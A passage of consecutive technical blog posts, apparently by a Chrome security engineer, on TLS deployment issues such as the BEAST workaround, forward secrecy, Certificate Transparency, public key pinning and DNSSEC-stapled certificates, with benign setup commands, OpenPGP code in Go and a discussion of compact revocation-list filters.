1/n-1 record splitting doesn't hit that problem, but it turns out that there's a fair amount of code out there that assumes that the entire HTTP request comes in a single read. The single byte record breaks that.

We first implemented 1/n-1 record splitting in Chrome 15 but backed off after only a couple of days because logging into several large sites broke. But that did motivate the sites to fix things so that we could switch it on in Chrome 16 and it stuck that time.

Opera also implemented it around this time, but I think Chrome took the brunt of the bug reports and it's time consuming dealing with them. Myself and a colleague have been emailing and phoning a lot of sites and vendors while dealing with upset users and site admins. Chrome certainly paid a price for moving before Firefox and IE but then we're nice like that.

Thankfully, this week, Microsoft released a security update which implements 1/n-1 record splitting in SChannel and switches it on in IE. (Although it defaults to off for other users of SChannel, unlike NSS.) Now the sites which broke with Chrome 16 are also broken in a patched IE and that takes some pressure off us. In a few weeks, Firefox 10 should be released and then we'll be about as good as we're going to get.

After taking the brunt with Chrome 16, there is one case that I'm not going to fight: Plesk can't handle POST payloads that don't come in a single read. Chrome (currently) sends POSTs as two writes: one for the HTTP headers and a second for the POST body. That means that each write is split into two records and Plesk breaks because of the second split. IE and Firefox send the headers and body in a single write, so there's only a single split in the HTTP headers, which Plesk handles.

Chrome will start merging small POST bodies into the headers with Chrome 17 (hopefully) and this will fix Plesk. Also, merging as Firefox and IE do saves an extra packet so it's worthwhile on its own. Once again, anything that's mostly true soon becomes an unwritten rule on the Internet.

It's worth contrasting the BEAST response to the renegotiation attack. The BEAST workaround caused a number of problems, but it worked fine for the vast majority of sites. The renegotiation fix requires that very nearly every HTTPS site on the Internet be updated and then that browsers refuse to talk to unpatched servers.

I'd bet that we'll not manage to get enough patched servers for any browser to require it this side of 2020. Unpatched servers can still disable renegotiation to protect themselves, but it's still not hard to find major sites that allow insecure renegotiation (www.chase.com was literally the second site that I tried).

OTR in Go

“Off the record” is, unfortunately, an overloaded term. To many it's feature in gTalk and AOL IM which indicates that the conversation isn't logged. However, to crypto folks it's a protocol for secure chat.

(In fact, resoloving the ambiguity is on the EFF's wish list.)

Pidgin has been my chat client of choice for some time because it's pretty fully featured and supports OTR via a plugin. However, I just don't trust it from a security point of view. The latest incident was only a couple of weeks ago: CVE-2011-3919.

So, I implemented otr in Go, as well as an XMPP library and client. It's an absolutely minimal client (except for OTR support) and implements only what I absolutely need in a client.

But it does mean that the whole stack, including the TLS library, is implemented in a memory safe language. (On the other hand, pretty much everything in that stack, from the modexp function to the terminal handling code was written by me and has never really been audited. I'm a decent programmer but I'm sure there are some howlers of security issues in there somewhere.)

Certificate Transparency

(I don't have comments on this blog, but you can comment on my Google+ post.)

Ben Laurie and I have been working on a longer term plan for improving the foundations of the certificate infrastructure on which most Internet transport security is based on these days. Although Chrome has public key pinning for some domains, which limits the set of permitted certificates, we don't see public key pinning as a long term solution (and nor was it ever designed to be).

For the 10 second summary of the plan, I'll quote Ben: “certificates are registered in a public audit log. Servers present proofs that their certificate is registered, along with the certificate itself. Clients check these proofs and domain owners monitor the logs.”. I would add only that anyone can check the logs: the certificate infrastructure would be fully transparent.

We now have an outline of the basic idea and will be continuing to flesh it out in the coming months, hopefully in conjunction with other browser vendors.

But I thought that, at the outset, it would be helpful to describe some of the limitations to the design space, as I see them:

No side-channels

As I've previously described, side-channels occur when a browser needs to contact a server other than the immediate destination in order to verify a certificate. Revocation checking with OCSP is an example of a side-channel used today.

But in order to be effective, side-channels invariably need to block the certificate verification until they complete, and that's a big problem. The Internet isn't fully connected. Captive portals, proxies and firewalls all mean that the only thing you can really depend on talking to is the immediate destination server. Because of this, browsers have never been able to make OCSP lookups blocking, and therefore OCSP is basically useless for security.

And that's not to mention the privacy, performance and functionality issues that arise from needing side-channels. (What happens when the side-channel server goes down?)

So our design requires that the servers send us the information that we require. We can use side-channels to check up on the logs, but it's an asynchronous lookup.

It's not opt-in, it's all-in

SSL Stripping is a very easy and very effective attack. HSTS prevents it and is as easy to deploy as anything can be for HTTPS sites. But, despite all this, and despite a significant amount of evangelism, take up has been very limited, even by sites which are HTTPS only and the subject of attacks.

While HSTS really has to be opt-in, a solution to the certificate problem doesn't. Although our scheme is incrementally deployable, the eventual aim is that it's required for everybody. Thankfully, since certificates have to be renewed there's an obvious means to incrementally deploy it: require it for certificates issued after a certain date. Although an eventual hard requirement is still needed, it's a lot less of a problem.

It's easy on the server operator

Since the aim is to make it a requirement for all servers, we've sacrificed a lot in order to make it very easy on the server operator. For most server operators, their CA will probably take care of fetching the audit proofs, meaning there's no additional work at all.

Some initial designs included short-lived log signatures, which would have solved the revocation problem. (Revocation would simply be a matter of instructing the logs to stop signing a given certificate.) However, this would have required server operators to update their audit proofs on a near-daily basis. After discussions it became clear that such a requirement wouldn't be tenable for many and so we reluctantly dropped it.

We are also sacrificing decentralisation to make things easy on the server. As I've previously argued, decentralisation isn't all it's cracked up to be in most cases because 99.99% of people will never change any default settings, so we haven't given up much. Our design does imply a central set of trusted logs which is universally agreed. This saves the server from possibly having to fetch additional audit proofs at runtime, something which requires server code changes and possible network changes.

There are more valid certificates than the one that's currently serving

Cheap virtual hosting and EC2 have made multi-homed services common. Even small to medium scale sites have multiple servers these days. So any scheme that asserts that the currently serving certificate is the only valid certificate will run into problems when certificates change. Unless all the servers are updated at exactly the same time, then users will see errors during the switch. These schemes also make testing a certificate with a small number of users impossible.

In the end, the only real authority on whether a certificate is valid is the site itself. So we don't rely on external observations to decide on whether a certificate is valid, instead to seek to make the set of valid certificates for a site public knowledge (which it currently isn't), so that the site can determine whether it's correct.

It's not easy to do

We believe that this design will have a significant, positive impact on an important part of Internet security and that it's deployable. We also believe that any design that shares those two properties ends up looking a lot like it. (It's no coincidence that we share several ideas with the EFF's Sovereign Keys.)

None the less, deployment won't be easy and, hopefully, we won't be pushing it alone.

Forward secrecy for Google HTTPS

As announced on the Google Security Blog, Google HTTPS sites now support forward secrecy. What this means in practice is two things:

Firstly, the preferred cipher suite for most Google HTTPS servers is ECDHE-RSA-RC4-SHA. If you have a client that supports it, you'll be using that ciphersuite. Chrome and Firefox, at least, support it.

Previously we were using RSA-RC4-SHA, which means that the client (i.e. browser) picks a random key for the session, encrypts it with the server's public key and sends it to the server. Since only the holder of the private key can decrypt the session key, the connection is secure.

However, if an attacker obtains the private key in the future then they can decrypt recorded traffic. The encrypted session key can be decrypted just as well in ten years time as it can be decrypted today and, in ten years time, the attacker has much more computing power to break the server's public key. If an attacker obtains the private key, they can decrypt everything encrypted to it, which could be many months of traffic.

ECDHE-RSA-RC4-SHA means elliptic curve, ephemeral Diffie-Hellman, signed by an RSA key. You can see a previous post about elliptic curves for an introduction, but the use of elliptic curves is an implementation detail.

Ephemeral Diffie-Hellman means that the server generates a new Diffie-Hellman public key for each session and signs the public key. The client also generates a public key and, thanks to the magic of Diffie-Hellman they both generate a mutual key that no eavesdropper can know.

The important part here is that there's a different public key for each session. If the attacker breaks a single public key then they can decrypt only a single session. Also, the elliptic curve that we're using (P-256) is estimated to be as strong as a 3248-bit RSA key (by ECRYPT II), so it's unlikely that the attacker will ever be able to break a single instance of it without a large, quantum computer.

While working on this, Bodo Möller, Emilia Kasper and I wrote fast, constant-time implementations of P-224, P-256 and P-521 for OpenSSL. This work has been open-sourced and submitted upstream to OpenSSL. We also fixed several bugs in OpenSSL's ECDHE handling during deployment and those bug fixes are in OpenSSL 1.0.0e.

Session Tickets

The second part of forward secrecy is dealing with TLS session tickets.

Session tickets allow a client to resume a previous session without requiring that the server maintain any state. When a new session is established the server encrypts the state of the session and sends it back to the client, in a session ticket. Later, the client can echo that encrypted session ticket back to the server to resume the session.

Since the session ticket contains the state of the session, and thus keys that can decrypt the session, it too must be protected by ephemeral keys. But, in order for session resumption to be effective, the keys protecting the session ticket have to be kept around for a certain amount of time: the idea of session resumption is that you can resume the session in the future, and you can't do that if the server can't decrypt the ticket!

So the ephemeral, session ticket keys have to be distributed to all the frontend machines, without being written to any kind of persistent storage, and frequently rotated.

Result

We believe that forward secrecy provides a fairly significant benefit to our users and we've contributed our work back to OpenSSL in the hope that others will make use of it.

Classifying solutions to the certificate problem

This is something that I wrote up internally, but which Chris Palmer suggested would be useful to post publicly for reference. It presents some, somewhat artificial, axis on which I believe that all proposed solutions to addressing weaknesses in the current certificate ecosystem fall. By dividing the problem into those decisions, I hope to make the better solutions clearer.

Axis 1: Private vs public signing

At the moment we have private signing. A CA can sign a certificate and tell nobody about it and the certificate is still valid. This is the reason that we have to go crawl the Internet in order to figure out how many intermediate CA certs there are.

In public signing, certificates aren't valid unless they're public.

There are degrees of how public schemes are. Convergence is a public scheme: certificates have to be visible to the notaries, but it's a lot less public than a scheme where all certificates have to be published. And published where? Highly public schemes imply some centralisation.

Private schemes don't protect us from CAs acting in bad faith or CAs which have been compromised. Public schemes help a lot in these cases, increasingly so the more public they are. Although a certificate might be valid for a short time, evidence of misbehavior is recorded. Public schemes also allow each domain to monitor all the certificates for their domain. Fundamentally, the only entity that can answer the question of whether a certificate is legitimate is the subject of the certificate itself. (See this tale of a Facebook certificate.)

Private schemes have the advantage of protecting the details of internal networks (i.e. not leaking the name www.corp.example.com).

Axis 2: Side channels or not

Revocation checking which calls back to the CA is a side channel. Convergence notaries are too. OCSP stapling is not, because the server provides the client with everything that it needs (assuming that OCSP stapling worked).

Side channels which need to be a hard fail are a problem: it's why revocation checking doesn't actually work. Private networks, hotel networks and server downtime are the issues. Side-channels are also a privacy and performance concern. But they're easier on the server operator and so more likely to be deployed.

In the middle are soft-fail side-channels. These offer limited protection because the connection proceeds even when the side-channel fails. They often queue the certificate up for later reporting.

Axis 3: Clocks or not

OCSP with nonces doesn't need clock sync. OCSP with time stamps does.

Keeping clocks in sync is a problem in itself, but it allows for short lived statements to be cached. It can also be a useful security advantage: Nonces require that a signing key be online because it has to sign a constant stream of requests. With clocks, a single response can be served up repeatedly and the key kept largely off-line. That moves the online key problem to the clock servers, but that's a smaller problem. A compromised clock server key can be handled by querying several concurrently and picking the largest cluster of values.

Examples

OCSP today is {private,side-channel,clock}. The 'let's fix OCSP' solutions are typically {private,side-channel,no-clock} (with an option for no-side-channel). Convergence is {mostly-public,side-channel,no-clock}.

I think the answer lies with {public,no-side-channel,clock}, but it's a trek to get there. Maybe something for a future post.

False Start: Brocade broken again

I wrote previously that Brocade had released a firmware update for their ServerIron SSL terminators which fixed an incompatibility with False Start. However, it now appears that they didn't fix the underlying issue, rather they special cased Chrome's current behaviour.

Sadly, due to Chrome implementing a workaround for the BEAST attack, their special casing doesn't work anymore and breaks Chrome 15.

So, if you run a Brocade ServerIron you should contact me ASAP. I'll be adding sites running this hardware to the False Start blacklist for Chrome 15 to allow Brocade to release another firmware update.

Chrome and the BEAST

Thai Duong and Juliano Rizzo today demoed an attack against TLS 1.0's use of cipher block chaining (CBC) in a browser environment. The authors contacted browser vendors several months ago about this and so, in order not to preempt their demo, I haven't discussed any details until now.

Contrary to several press reports, Duong and Rizzo have not found, nor do they claim, any new flaws in TLS. They have shown a concrete proof of concept for a flaw in CBC that, sadly, has a long history. Early reports of the problem date back nearly ten years ago and Bard published two papers detailing the problem.

The problem has been fixed in TLS 1.1 and a workaround for SSL 3.0 and TLS 1.0 is known, so why is this still an issue?

The workaround (prepending empty application data records) is perfectly valid according to the protocol but several buggy implementations of SSL/TLS misbehaved when it was enabled. After Duong and Rizzo notified us, we put the same workaround back into Chrome to see if the state of the Internet had improved in the years since the last attempt. Sadly it was still infeasible to implement this workaround and the change had to be reverted.

Use of TLS 1.1 would also have solved the issue but, despite it being published in 2006, common SSL/TLS libraries still don't implement it. But even if there was widespread deployment of TLS 1.1, it wouldn't have helped avoid problems like this. Due to a different, common bug in SSL 3.0 implementations (nearly 12 years after SSL 3.0 was obsoleted by TLS 1.0), browsers still have to perform SSL 3.0 downgrades to support buggy servers. So even with a TLS 1.1 capable browser and server, an attacker can trigger a downgrade to SSL 3.0 and bypass the protections of TLS 1.1.

Finally, the CBC attacks were believed to be largely theoretical but, as Duong and Rizzo have pointed out today, that's no longer the case.

Initially the authors identified HTML5 WebSockets as a viable method of exploiting the CBC weakness but, due to unrelated reasons, the WebSockets protocol was already in the process of changing in such a way that stopped it. The new WebSockets protocol shipped with Chrome 14 but several plugins have been found to offer features that might allow the attack to be performed.

Duong and Rizzo confirmed that the Java plugin can be used, but Chrome already blocks the execution of Java by default. Other plugins, if installed, can be disabled on the about:plugins page if the user wishes.

The attack is still a difficult one; the attacker has to have high-bandwidth MITM access to the victim. This is typically achieved by being on the same wireless network as the victim. None the less, it's a much less serious issue than a problem which can be exploited by having the victim merely visit a webpage. (Incidentally, we pushed out a fix to all Chrome users for such a Flash bug only a few days ago.)

Also, an attacker with MITM abilities doesn't need to implement this complex attack. SSL stripping and mixed-scripting issues are much easier to exploit and will take continued, sustained effort to address. Duong and Rizzo have highlighted this fact by choosing to attack one of the few HSTS sites.

Thanks to an idea suggested by Xuelei Fan, we have another workaround for the problem which will, hopefully, cause fewer incompatibility problems. This workaround is currently being tested on the Chrome dev and beta channels but we haven't pushed it on the stable channel yet. Since we don't really know if the fix will cause problems it's not something that we want to drop on people without testing. The benefit of a fix to Chrome's TLS stack is also limited as Chrome already uses the newer WebSockets protocol and it doesn't fix problems in plugins.

If it turns out that we've misjudged something we can quickly react, thanks to Chrome's auto-update mechanism.

It's also worth noting that Google's servers aren't vulnerable to this problem. In part due to CBC's history, Google servers have long preferred RC4, a cipher that doesn't involve CBC mode. Mention has also been made of Chrome's False Start feature but, since we don't believe that there are any vectors using Chrome's stack, that's immaterial.

DNSSEC Certificates now in Chrome Stable

A few months back I described DNSSEC authenticated HTTPS in Chrome. This allows sites to use DNSSEC, rather than traditional, certificates and is aimed at sites which currently use no HTTPS, or self-signed certificates. Since Chrome 14 is now stable, all Chrome users now have this experimental feature.

(Also, the serialisation format has been documented.)

Why not Convergence?

In light of recent events, I've had several requests to implement Convergence in Chrome. For those who don't know and, frankly, for anyone interested in SSL, I highly recommend watching Moxie's talk on the subject from this year's Black Hat. You can also check out the project website.

Moxie, having actually thought about the issue and coded something up, has already done a thousand times more to address the problem than almost anyone else. But I don't think that Convergence is something we would add in Chrome:

Although the idea of trust agility is great, 99.99% of Chrome users would never change the default settings. (The percentage is not an exaggeration.) Indeed, I don't believe that an option for setting custom notaries would even meet the standards for inclusion in the preferences UI.

Given that essentially the whole population of Chrome users would use the default notary settings, those notaries will get a large amount of traffic. Also, we have a very strong interest for the notaries to function, otherwise Chrome stops working. Combined, that means that Google would end up running the notaries. So the design boils down to Chrome phoning home for certificate validation. That has both unacceptable privacy implications and very high uptime requirements on the notary service.

It also doesn't address the two problems that Moxie highlights: internal servers and captive portals. It's not clear how either would work in this design, at least without giving up on security and asking the user. (These two problems, captive portals esp, are the bane of many an idea in this area.)

None of the above argues against allowing Convergence as an extension for those who wish to run it. We don't currently have an extension API for controlling certificate decisions and I'm not inherently opposed to one. It would be additional complexity and something that we would have to support in the future, so it's not without costs, but mostly it's not there because nobody has written it and I'm afraid that I don't have any plans to do so.

False Start: past time to fix your servers

A year ago I wrote about False Start in Chrome. In short: Chrome cuts the TLS handshake short to save a round trip in a full handshake. Since then we've posted results that show a 30% drop in SSL handshake latency.

When we enabled False Start by default in Chrome, we also included a list of the very small number of incompatible sites. This list was built into the browser in order to avoid breaking these sites. (See the original post for the reasoning.)

For some time I've been randomly eliminating chunks of that list. Mostly it's been the case that sites have already upgraded. I don't think that they did so specifically with False Start in mind, but that it was just a regular maintainance.

But it's now time that all sites are updated because the list is fading away fast:

  • If you run A10 SSL terminators, ensure that you have firmware >= 2.4.3-p4
  • If you run Brocade SSL terminators, ensure that you have firmware >= 10.2.01y
  • If you run F5 SSL terminators, you need to be running the native SSL stack (which is the default, as opposed to the `compat' stack)
  • If you run FTMG SSL terminators, you need Service Pack 2

DNSSEC authenticated HTTPS in Chrome

Update: this has been removed from Chrome due to lack of use.

DNSSEC validation of HTTPS sites has been hanging around in Chrome for nearly a year now. But it's now enabled by default in the current canary and dev channels of Chrome and is on schedule to go stable with Chrome 14. If you're running a canary or dev channel (and you need today's dev channel release: 14.0.794.0) then you can go to https://dnssec.imperialviolet.org and see a DNSSEC signed site in action.

DNSSEC stapled certificates (and the reason that I use that phrase will become clear in a minute) are aimed at sites that currently have, or would use, self-signed certificates and, possibly, larger organisations that are Chrome based and want certificates for internal sites without having to bother with installing a custom root CA on all the client devices. Suggesting that this heralds the end of the CA system would be utterly inaccurate. Given the deployed base of software, all non-trival sites will continue to use CA signed certificates for decades, at least. DNSSEC signing is just a gateway drug to better transport security.

I'm also going to see how it goes for a while. The most likely outcome is that nobody uses them and I pull the code out in another year's time. There are also some risks:

In theory, it should be hard to get a CA certificate for, say, paypa1.com (note the digit 1 in there). The CA should detect a phishing attempt and deny the certificate. With DNSSEC, there's no such filtering and a phisher could get a green padlock on any site that they can get a DNS name for. It's not clear whether this filtering is actually enforced by all public CAs, nor that phishing is more effective over HTTPS. Additionally, Chrome has anti-phishing warnings built in which is a better layer at which to handle this problem.

In the end, if you want a certificate that identifies a legal entity, rather than a domain name, then you want EV certificates. None the less, if DNSSEC stapled certificates end up being predominantly used for abuse then I'll probably kill them.

It's also possible that lots of sites will use these certificates, triggering warnings in other browsers thus further desensitising those users to such warnings. But that's one of those “good to have” problems and, in this very unlikely situation, there will have to be a push to add wider support.

For site operators

For site operators it's not just a question of dropping in a DNS record and forgetting about it (although nearly). The DNSSEC chain has to be embedded in the certificate and the certificate has to be refreshed, probably in a nightly cron job.

This is why I used the phrase “DNSSEC stapled certificate” above. These certificates are self-signed X.509 certificates with a DNSSEC chain embedded in an extension. The alternative would be to have the client perform a DNSSEC lookup itself. In the long term this may be the answer but, for now, client platforms don't support DNSSEC resolution and I'm in no rush to drop a DNSSEC resolving library into Chrome. We also have data that suggests that ~1% of Chrome (Linux) users can't resolve arbitary DNS record types (because of ‘hotel networks’, firewalls etc). Finally, having the client do a lookup is slower. Since DNSSEC data is signed it doesn't matter how you get it so having the server do the work and cache the result is simplier, faster and dependable.

The DNSSEC stapled data is embedded in an X.509 certificate (as opposed to extending TLS or using a different certificate format) because every HTTPS server will take an X.509 certificate as an opaque blob and it Just Works. All the other possiblilies introduce significant barriers to adoption.

You should also keep in mind that the format of the DNS record may change in the future. I've no current plans to change it but these things are still working themselves out.

Setting it up

First you need a zone that's DNSSEC signed. Setting that up is a little beyond the scope of this blog post but I use BIND with auto-signing as a server and DynDNS as a registra.

Second, you need to clone git://github.com/agl/dnssec-tls-tools.git.

$ openssl genrsa 1024 > privkey.pem
$ openssl rsa -pubout -in privkey.pem > pubkey.pem
$ python ./gencaa.py pubkey.pem
EXAMPLE.COM. 60 IN TYPE257 \# 70 020461757468303e3039060a2b06010401d6790203010…

Take the DNS record that's printed out by gencaa.py, change the domain name (and possibly the TTL) and add it to your zone. If you need to do anything else to make the record accessable to the world, do that now. You should be able to see the record with dig -t type257 example.com.

Now we get the DNSSEC chain and create a certificate with it embedded:

$ python ./chain.py example.com chain
$ gcc -o gencert gencert.c -Wall -lcrypto
$ ./gencert privkey.pem chain > cert.pem

You can check the certificate with openssl x509 -text < cert.pem | less.

CNAMES should work but I haven't implemented DNS wildcards. Also, that code was written to run easily (hence C and Python) rather than being nice code that's going to handle lots of edge cases well. chain.py is just shelling out to dig :)

You now have a key pair (privkey.pem and cert.pem) that can be used by any HTTPS server in the usual way. Keep in mind that DNSSEC signatures expire, often on the order of a week. So you'll need to setup a cron job to download the chain, rebuild the certificate and HUP the HTTPS server.

OpenPGP support in Go

Go is currently my favourite programming language for recreational programming. Mentioning Go appears to send some people into a rage judging by the sort of comments that arise on Hacker News, proggit and so on but, thankfully, this blog doesn't have comments.

Over the past few months I've been (very) slowly building OpenPGP support into Go's crypto library. (You can get my key, DNSSEC signed, via PKA: dig +dnssec -t txt agl._pka.imperialviolet.org). I don't get to use PGP often enough but, even when I have (I used to run an email verifying auto-signer), I've resorted to shelling out to gpg. I understand that GPG's support for acting as a library has improved considerably since then, but half the aim of this is that it's recreational programming.

So, here's a complete Go program using the OpenPGP library: (Note, if you wish to compile these programs you'll need a tip-of-tree Go)

package main

import (
  "crypto/openpgp"
  "crypto/openpgp/armor"
  "fmt"
  "os"
)

func main() {
  w, _ := armor.Encode(os.Stdout, "PGP MESSAGE", nil)
  plaintext, _ := openpgp.SymmetricallyEncrypt(w, []byte("golang"), nil)
  fmt.Fprintf(plaintext, "Hello from golang.\n")
  plaintext.Close()
  w.Close()
  fmt.Print("\n")
}

It'll output a symmetrically encrypted message, like this:

-----BEGIN PGP MESSAGE-----

wx4EBwMCkdZyiLAEewZgIuDNFqo0FBYNp4ZGpaiaAjHS4AHkLcerCkW9sCqLdBQc
GH6HUOEwZeCr4ILhUBHgnOID5zAh4PDkdVSUDxFj0KITDfgDXMptL+Ai4aTL4Mzg
4uCX5C7gKEnS8gsxdwC67zQzUMbiSS92duG39AA=
=NuOw
-----END PGP MESSAGE-----

You can feed that into gpg -c and decrypt with the passphrase golang if you like. Since all the APIs are stream based you can process arbitrary length messages without having to fit them into memory.

We can also do public key stuff:

package main

import (
  "crypto/openpgp"
  "crypto/openpgp/armor"
  "fmt"
  "os"
)

func getKeyByEmail(keyring openpgp.EntityList, email string) *openpgp.Entity {
  for _, entity := range keyring {
    for _, ident := range entity.Identities {
      if ident.UserId.Email == email {
        return entity
      }
    }
  }

  return nil
}

func main() {
  pubringFile, _ := os.Open("pubring.gpg")
  pubring, _ := openpgp.ReadKeyRing(pubringFile)
  privringFile, _ := os.Open("secring.gpg")
  privring, _ := openpgp.ReadKeyRing(privringFile)

  myPrivateKey := getKeyByEmail(privring, "me@mydomain.com")
  theirPublicKey := getKeyByEmail(pubring, "bob@example.com")

  w, _ := armor.Encode(os.Stdout, "PGP MESSAGE", nil)
  plaintext, _ := openpgp.Encrypt(w, []*openpgp.Entity{theirPublicKey}, myPrivateKey, nil)
  fmt.Fprintf(plaintext, "Hello from golang.\n")
  plaintext.Close()
  w.Close()
  fmt.Printf("\n")
}

And, of course, it can also decrypt those messages, check signatures etc. The missing bits are ElGamal encryption, support for clearsigning and big bits of functionality around web-of-trust, manipulating keys etc. None the less, Camlistore is already using it and it appears to be working for them.

Public key pinning

Starting with Chrome 13, we'll have HTTPS pins for most Google properties. This means that certificate chains for, say, https://www.google.com, must include a whitelisted public key. It's a fatal error otherwise. Credit goes to my colleague, Chris Evans, for much of this.

The whitelisted public keys for Google currently include Verisign, Google Internet Authority, Equifax and GeoTrust. Thus Chrome will not accept certificates for Google properties from other CAs. As ever, you can look at the source if you wish (search that file for "Verisign"). DigiCert also issues some of our certificates, but we aren't yet enforcing pinning for those domains.

This works with HSTS preloading of Google properties to ensure that, when a user types gmail.com into the address bar, they only get the real Gmail, no matter how hostile the network.

What about MITM proxies, Fiddler etc?

There are a number of cases where HTTPS connections are intercepted by using local, ephemeral certificates. These certificates are signed by a root certificate that has to be manually installed on the client. Corporate MITM proxies may do this, several anti-virus/parental control products do this and debugging tools like Fiddler can also do this. Since we cannot break in these situations, user installed root CAs are given the authority to override pins. We don't believe that there will be any incompatibility issues.

Why public key hashes, not certificate hashes?

In general, hashing certificates is the obvious solution, but the wrong one. The problem is that CA certificates are often reissued: there are multiple certificates with the same public key, subject name etc but different extensions or expiry dates. Browsers build certificates chains from a pool of certificates, bottom up, and an alternative version of a certificate might be substituted for the one that you expect.

For example, StartSSL has two root certificates: one signed with SHA1 and the other with SHA256. If you wished to pin to StartSSL as your CA, which certificate hash would you use? You would have to use both, but how would you know about the other root if I hadn't just told you?

Conversely, public key hashes must be correct:

Browsers assume that the leaf certificate is fixed: it's always the starting point of the chain. The leaf certificate contains a signature which must be a valid signature, from its parent, for that certificate. That implies that the public key of the parent is fixed by the leaf certificate. So, inductively, the chain of public keys is fixed, modulo truncation.

The only sharp edge is that you mustn't pin to a cross-certifying root. For example, GoDaddy's root is signed by Valicert so that older clients, which don't recognise GoDaddy as a root, still trust those certificates. However, you wouldn't want to pin to Valicert because newer clients will stop their chain at GoDaddy.

Also, we're hashing the SubjectPublicKeyInfo not the public key bit string. The SPKI includes the type of the public key and some parameters along with the public key itself. This is important because just hashing the public key leaves one open to misinterpretation attacks. Consider a Diffie-Hellman public key: if one only hashes the public key, not the full SPKI, then an attacker can use the same public key but make the client interpret it in a different group. Likewise one could force an RSA key to be interpreted as a DSA key etc.

(It's possible that a certificate could be reissued with a different SPKI for the same public key. That would be a second sharp edge but, to my knowledge, that has never happened. SPKIs for any public key type should have a distinguished encoding.)

Can I get this for my site?

If you run a large, high security site and want Chrome to include pins, let me know. For everyone else we hope to expose pinning via HSTS, although the details have yet to be worked out. You can experiment with pinning via the HSTS debug UI (chrome://net-internals/#hsts) if you have a new enough version of Chrome.

Smaller than Bloom filters

I've been looking at what would be needed in order to have a global view of CRLs in browsers. At the moment revocation has three problems: privacy (by asking the CA about the status of a certificate you're revealing to them what you're looking at), performance (OCSP checks take hundreds of milliseconds which adds up to thousands of milliseconds when subdomains are in play) and functionality (it doesn't work).

Having a global view of (nearly) all CRLs would mostly solve these issues. We could quickly determine that a certificate is good without leaking information and perform a hard fail revocation check if we believe that a certificate has been revoked. So that begs the question of how to get a global view of CRLs to the client. A Bloom filter would be the obvious choice since we can't accept false negatives (and a Bloom doesn't generate them) but we can cope with false positives (which it does produce).

But we really want to keep this structure small. Every extra KB has to be transferred to hundreds of millions of clients (including mobile devices) and takes up memory on each of those devices. We also have another trick up to play: we don't care much about query time. For a normal Bloom filter, query time is very important but here, if it took several milliseconds, that would be ok.

Given those limitations we can look at data structures other than a traditional Bloom filter and which are smaller and slower.

An optimum Bloom filter takes up n·log(e)ln(1/p) bits (where p is the false positive probability and n is the number of inserted elements). You can't always hit that because you can't have a fraction of a hash function but the theoretical lower bound is just n·log(1/p) bits, a factor if log(e)≅1.44 smaller. Other structures get closer to this bound.

First, there are compressed bloom filters[PDF]. The idea here is that one builds a larger Bloom filter with fewer hash functions and compresses it. In the paper they discuss compressing for transport, but I'm also thinking about it being compressed in memory. An interesting result from the paper is that the optimum number of hash functions for a normal Bloom filter is actually the worst case for a compressed filter.

The optimum number of hash functions for a compressed Bloom is one. Normally that would make the Bloom too large to deal with uncompressed, but if you're not actually going to store the uncompressed version, that's less of an issue.

A Bloom filter with a single hash function requires 1/p bits per element. From that, it's obvious that the density of the filter is p. So a perfect entropy coder (and a range coder is basically perfect) should be able to compress that to just n·1/p·H(p) bits, where H is the binary entropy. Now we can consider how close a compressed Bloom gets to the lower bound that we considered before

A compressed bloom takes 1/p·H(p) per element and the lower bound is ln(1/p). Here's a Wolfram Alpha plot of the expansion factor. The expansion factor goes from about 0.1 to 0.2 over a range of reasonable values of p. For p = 1/1024, it's 0.144. Remember that the expansion factor of a normal Bloom filter is 0.44, so that's quite a bit better.

However, the uncompressed size, even if you're just streaming it, is a problem. For 400K revoked certificates with a 1 in 1024 false positive rate, you're looking at 51MB of uncompressed data. In order to process that you would have to call into the entropy coder 410 million times.

There's an obvious solution to this: split the Bloom into chunks and hash the input in order to find the correct chunk. That works fine, but there's also another answer which may be cleaner: Golomb Compressed Sets. (The idea was first mentioned in this paper, I believe.)

A GCS mirrors the structure of the compressed Bloom filter: we're hashing the elements into a space of size n/p. But, while a compressed Bloom filter treats this as a bitmap, a GCS treats it as a list of values. Since the values are the result of hashing, we can assume that they are uniformly distributed, sort them and build a list of differences. The differences will be geometrically distributed with a parameter of p. Golomb coding is the optimal encoding for geometrically distributed values: you divide by 1/p, encode that in unary then encode the remainder in binary.

A GCS is going to be slightly larger than a compressed bloom filter because the Golomb coding uses a whole number of bits for each value. I don't have an equation for the overhead, but I found it to be between 0.1 and 0.2 bits per set element, which is pretty minimal. It's also an advantage because it means that the user can index the GCS to any degree. With a chunked, compressed Bloom filter the generator has to decide on the chunking and also deal with the inefficiencies resulting from imperfect balance.

But what about that lower bound, can anything hit it? Yes, matrix filters (paper). The idea here is that you hash elements into n values of a finite field. Then, from n such elements you have an n by n matrix where the rows are independent with very high probability. You then perform Gaussian elimination to solve M·b = 1 (where M is the matrix, b is an n column vector and 1 is an n column vector of ones).

After this, b is your matrix filter. Given b, one can hash an element to generate a vector, multiply by b and get the original value back. If the equation was in M then the result has to be 1. Otherwise, the result is a random element from the field. If you use GF(210) as the field, then the false positive probability is 1 in 1024.

As an example, consider the case of a two element set. You would hash these elements into equations that define lines in the plane and the matrix filter is the intersection of these lines. Querying the filter means hashing the element to form a line and seeing if it intersects that point.

Matrix filters can also be used to associate values with the elements. In this case, for an element in the set you'll always get the correct value and for anything else you'll get a random value. (So you don't get to know if the element was in the set in this case.)

Matrix filters hit the lower bound, but have some issues. First, in order to query the filter you have to read and process the whole filter, so you will have to chunk it. Secondly, if your false positive rate is not of the form 1/2n, then the field arithmetic is slower. But I'll deal with the most important problem, from my point of view, next.

Back to the motivation for a moment: we're looking to sync a global view of CRLs to browsers. The initial download is one thing, but we also have to push updates frequently (probably daily). That means that delta encoding is terribly important.

Delta compressing a compressed Bloom filter or a GCS is pretty obvious with a range coder in hand. Additions and deletions from the set are just additions and deletions of bits or values, respectively. But changes to a matrix filter mean rewriting everything. Consider the example of lines in a plane: changing one of the lines moves the intersection point in both dimensions.

So, in order to add elements you would either have to retransmit the chunks that they fall into or send an additional chunk (that would have to be checked every time). Deletions can't be realised without retransmitting a whole chunk so, over time, the useful fraction of elements in a chunk would fall. Since a GCS is only about 15% bigger, it wouldn't take long for the matrix filter to be worse off.

So, although matrix filters are beautiful, I think a GCS works best. I suspect that there's a deep reason why a structure which hits the lower size bound cannot be delta compressed, but I'm too dumb to figure it out if there is.

In the process of playing with this, I implemented everything to some degree. I'll throw the code on github at some point.

Multi-prime RSA trade offs

(This is a technical post: casual readers should skip it.)

I couldn't find data on the speed/security trade offs of multi-prime RSA anywhere, so I gathered the data myself and hopefully this blog post can be found by people in the future.

